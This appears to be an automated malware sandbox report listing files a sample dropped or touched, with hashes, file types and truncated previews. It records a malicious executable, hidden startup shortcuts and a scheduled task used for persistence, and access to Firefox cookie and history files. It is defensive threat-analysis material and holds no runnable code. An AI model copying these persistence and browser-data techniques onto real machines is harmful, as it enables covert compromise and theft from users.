                                                                                                                                                                                                                                                                                        Process:C:\Users\user\DocumentsDGHCBAAEHC.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3183104
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.676354356914785
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:uy6wMYLfP1XiKZjadNJWuLSAxYMms6tpFAp7LBBdItN+CsTy3KvRa5W3PZfX:uy6wMYzNXiKBEJ5SAxp6h+NTnJ
                                                                                                                                                                                                                                                                                        MD5:219DA011BAD6CA9985808A7B2EF7C533
                                                                                                                                                                                                                                                                                        SHA1:20A1CC202B667A1646BA8DC862FC6B83863270F1
                                                                                                                                                                                                                                                                                        SHA-256:526E7692BCA7EE6EFEE8C13D543791DCAE7F1CC6AC74651B6B2FB94F7C8CBE6D
                                                                                                                                                                                                                                                                                        SHA-512:0C3741C1FF33D6B40BE3A11611D0E99F201BA976B70467AA54720443E5BDDD3177E419324173A89EC46492E64C33F33B542E8E8F5C3AC6BC18CCCAD75E69DF4B
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0....../1...@.................................W...k.............................0.............................\.0..................................................... . ............................@....rsrc...............................@....idata ............................@...abdubcdx..).......).................@...ajsqmvlu......0......l0.............@....taggant.0....0.."...p0.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 11 14:37:07 2024, mtime=Mon Nov 11 14:37:26 2024, atime=Mon Nov 11 14:37:09 2024, length=17547264, window=hide
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1179
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.945246707786037
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24:8kKPNI7iAKRRJgK9ZxyAeftexe7cbjqyFm:8koNI2AKRJZCte0hyF
                                                                                                                                                                                                                                                                                        MD5:C15E829035CCD329A69B366B96B5D3DA
                                                                                                                                                                                                                                                                                        SHA1:ED8AC3F1427D6CF29B463D88BD03790A9BF9D58C
                                                                                                                                                                                                                                                                                        SHA-256:BA132A8C29370559EDD49C1BFCA092E452D696F4472F7C4F8488B408ED29D156
                                                                                                                                                                                                                                                                                        SHA-512:3E5D8B4E725A002BC8AFC59E7FDF2852278FF084A266E64A2CE1809C8826DCC13D507B98CAA124E79E0F05BA22048FB0D819DD08AD0226537286ABF5C678BBC2
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:L..................F.... ...9 ..O4......O4..L87.O4............................:..DG..Yr?.D..U..k0.&...&......vk.v.....T-uO4..9xu.O4......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^kY||...........................%..A.p.p.D.a.t.a...B.P.1.....kY.|..Local.<......CW.^kY.|....b.....................E...L.o.c.a.l.....N.1.....kY.|..Temp..:......CW.^kY.|....l.....................;./.T.e.m.p.....^.1.....kY.|..100555~1..F......kY.|kY.|....M.........................1.0.0.5.5.5.2.0.0.1.....b.2.....kY.| .pidgeon.exe.H......kY.|kY.|....P.......................".p.i.d.g.e.o.n...e.x.e.......g...............-.......f............x.\.....C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe..3.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.5.5.5.2.0.0.1.\.p.i.d.g.e.o.n...e.x.e.............:...........|....I.J.H..K..:...`.......X.......965969...........hT..CrF.f4... ....B....,.......hT..CrF.f4... ....B....,..................1SPS.XF.L8C....&.m.q..

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 11 14:37:07 2024, mtime=Mon Nov 11 14:37:11 2024, atime=Mon Nov 11 14:37:09 2024, length=17547264, window=hide
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1179
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.933205298638063
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24:8QIKkNI7WrTR7gK1ZmyAeftexe7cbjqyFm:8RzNIarTRZ0Cte0hyF
                                                                                                                                                                                                                                                                                        MD5:5B33CF09BDEE31D9644AAAE7CC74C91F
                                                                                                                                                                                                                                                                                        SHA1:EEB8EB7EF8572DD56C7FDD88FE000D23F88E10D6
                                                                                                                                                                                                                                                                                        SHA-256:D85904B597C89E6AEF0BFF63A8CCEE2DFEA37A9E2E605768AC9D524C3672FABE
                                                                                                                                                                                                                                                                                        SHA-512:B1BB3620E307B9B0CD2303B43A7885A9B33D8EE3933292B1F419F1620C7E6FB87D817DCCCA81ED5DC2D994D6B10451DB98B3C962B65334057417457DE9870480
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Preview:L..................F.... ...9 ..O4...<..O4..L87.O4............................:..DG..Yr?.D..U..k0.&...&......vk.v.....T-uO4......O4......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^kY||...........................%..A.p.p.D.a.t.a...B.P.1.....kYz|..Local.<......CW.^kY||....b.........................L.o.c.a.l.....N.1.....kY.|..Temp..:......CW.^kY.|....l..................... ..T.e.m.p.....^.1.....kY.|..100555~1..F......kY.|kY.|....M.........................1.0.0.5.5.5.2.0.0.1.....b.2.....kY.| .pidgeon.exe.H......kY.|kY.|....P.......................".p.i.d.g.e.o.n...e.x.e.......g...............-.......f............x.\.....C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe..3.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.1.0.0.5.5.5.2.0.0.1.\.p.i.d.g.e.o.n...e.x.e.............:...........|....I.J.H..K..:...`.......X.......965969...........hT..CrF.f4... ....B....,.......hT..CrF.f4... ....B....,..................1SPS.XF.L8C....&.m.q..

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\DocumentsDGHCBAAEHC.exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3183104
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.676354356914785
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:uy6wMYLfP1XiKZjadNJWuLSAxYMms6tpFAp7LBBdItN+CsTy3KvRa5W3PZfX:uy6wMYzNXiKBEJ5SAxp6h+NTnJ
                                                                                                                                                                                                                                                                                        MD5:219DA011BAD6CA9985808A7B2EF7C533
                                                                                                                                                                                                                                                                                        SHA1:20A1CC202B667A1646BA8DC862FC6B83863270F1
                                                                                                                                                                                                                                                                                        SHA-256:526E7692BCA7EE6EFEE8C13D543791DCAE7F1CC6AC74651B6B2FB94F7C8CBE6D
                                                                                                                                                                                                                                                                                        SHA-512:0C3741C1FF33D6B40BE3A11611D0E99F201BA976B70467AA54720443E5BDDD3177E419324173A89EC46492E64C33F33B542E8E8F5C3AC6BC18CCCAD75E69DF4B
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0....../1...@.................................W...k.............................0.............................\.0..................................................... . ............................@....rsrc...............................@....idata ............................@...abdubcdx..).......).................@...ajsqmvlu......0......l0.............@....taggant.0....0.."...p0.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\DocumentsDGHCBAAEHC.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):284
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.4065748901211066
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:TyYIPPbXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBYlEt0:vIbf2RKQ1CGAFAjzvYRQVBBt0
                                                                                                                                                                                                                                                                                        MD5:E4BBDCFF53810DCB675C29B48E620CFE
                                                                                                                                                                                                                                                                                        SHA1:0A43E018C50D3F979742FAFB59F564B98585B2C4
                                                                                                                                                                                                                                                                                        SHA-256:4A9B75D85978E23FC5F517E72F4D1F3098FF77F7F659ADF22DA2BD9623F9D718
                                                                                                                                                                                                                                                                                        SHA-512:10FC6E35BC3EE6BDA463A5BCF38C7DDFD79084FF655AD85ADC9DB1DC912A4BCEE39E95A598711FF35ADFB4A0AA722578DFAB511AAE7501CDCDC5C21E24DE34A1
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:....M..pT..G......S.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................%.@3P.........................

                                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.465422057942023
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:MIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNgdwBCswSbe:xXD94+WlLZMM6YFH6+e
                                                                                                                                                                                                                                                                                        MD5:C914891D7ACBAF22E91E6530CCD9AA54
                                                                                                                                                                                                                                                                                        SHA1:F0BE9D5761D367175782D53B723E242DF7E811F1
                                                                                                                                                                                                                                                                                        SHA-256:48B9EE5F83CFAAF0947A27C72B29985EA8AE3CD3725C77DCA26DFFD1B4C6E10B
                                                                                                                                                                                                                                                                                        SHA-512:384FECB00C1A81ECCA41C5E959E6E887411C47C52F85E83A23E28FDF725038CADECB55FB341C2FB771C74AC3879FC829C65AED0B5E622A2714B2DB7D07A3B285
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.!*.O4..............................................................................................................................................................................................................................................................................................................................................C.=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 106

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6511)
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):6516
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.787937988690264
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:JYgEFd66666z+agrTFxIEQWOd9IBTYmGNMKGw9z:JYgC66666z+DTvIwOm6N5
                                                                                                                                                                                                                                                                                        MD5:9D91D8EFD28CBE964FB0E0528B3907D3
                                                                                                                                                                                                                                                                                        SHA1:1B87D545D9DD63C31FF98B3AB7C36C5B4B0E45C3
                                                                                                                                                                                                                                                                                        SHA-256:14D9161EE09279B85852BB38A18DE2C1E6EF480D034AD2508423CA527B8754D5
                                                                                                                                                                                                                                                                                        SHA-512:DD46316928FDE4D3FD4B9B9EB8B25CD1FC40F32552F8F4EEAE45E615D2846DF8B13707F26C8A887BBA74D93FDB71F4F37842E54293287B47A2BB9256B9C9F42E
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                        Preview:)]}'.["",["zodiac signs daily horoscope today","cooper rush","hannaford supermarkets","evolve primeape pokemon go","spacex starlink launch","nfl playoff picture","military veterans day free meals","tulsa king recap episode 9"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CgsvbS8wMTJud3ZyZBIURm9vdGJhbGwgcXVhcnRlcmJhY2sygwtkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFhQUFBQ0F3RUJBQUFBQUFBQUFBQUFBQUFBQmdRRkJ3TUkvOFFBTWhBQUFnRURBZ01IQWdRSEFBQUFBQUFBQVFJREFBUVJCUkloTVVFR0J4TlJZWEdSRklFaU1rSlNGUllqTTRLaHNmL0VBQmdCQUFNQkFRQUFBQUFBQUFBQUFBQUFBQUFCQX

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 107

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 108

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):174097
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.554845848492248
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
                                                                                                                                                                                                                                                                                        MD5:292ACC11525E24B0501DEAC4EB7B61D4
                                                                                                                                                                                                                                                                                        SHA1:4840E1B06489D1210E25C620AC0E4DEA33F4A574
                                                                                                                                                                                                                                                                                        SHA-256:A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
                                                                                                                                                                                                                                                                                        SHA-512:FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
                                                                                                                                                                                                                                                                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj||(_.jj=new hj)).set(a,b);(_.kj||(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a|1};_.sj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.tj=function(a,b,c){32&b&&c||(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 109

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):133690
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.433129247582976
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:1536:i7C/VNgk7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgFCFlOve2dzAcJ82O:fV7vhSJjxeX431PBLx8OF9jxYsci2i6o
                                                                                                                                                                                                                                                                                        MD5:DE549C914AA26B243ECC4093FDAA4F65
                                                                                                                                                                                                                                                                                        SHA1:D28B1284DF100A23E81B97BDE0C8D75F483AD575
                                                                                                                                                                                                                                                                                        SHA-256:6FDDC8F5EA0A2C17CE5ADF374FC202240F8CBD1CB0F50649C349EADCB109D795
                                                                                                                                                                                                                                                                                        SHA-512:FD0B60ADBEB0FE9A8432B6AB6C2E1C95DD7156DA932BEB571CB281B74C39ED8E41C67B44D01F4A5F9094907DC738714FEEA9D80C74D9DD3B289733C808A63CBA
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 110

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1302)
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):117949
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4843553913091005
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
                                                                                                                                                                                                                                                                                        MD5:A5D33473ED0997C008D1C053E0773EBE
                                                                                                                                                                                                                                                                                        SHA1:FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
                                                                                                                                                                                                                                                                                        SHA-256:14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
                                                                                                                                                                                                                                                                                        SHA-512:3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 111

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                        Size (bytes):5162
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                        MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                        SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                        SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
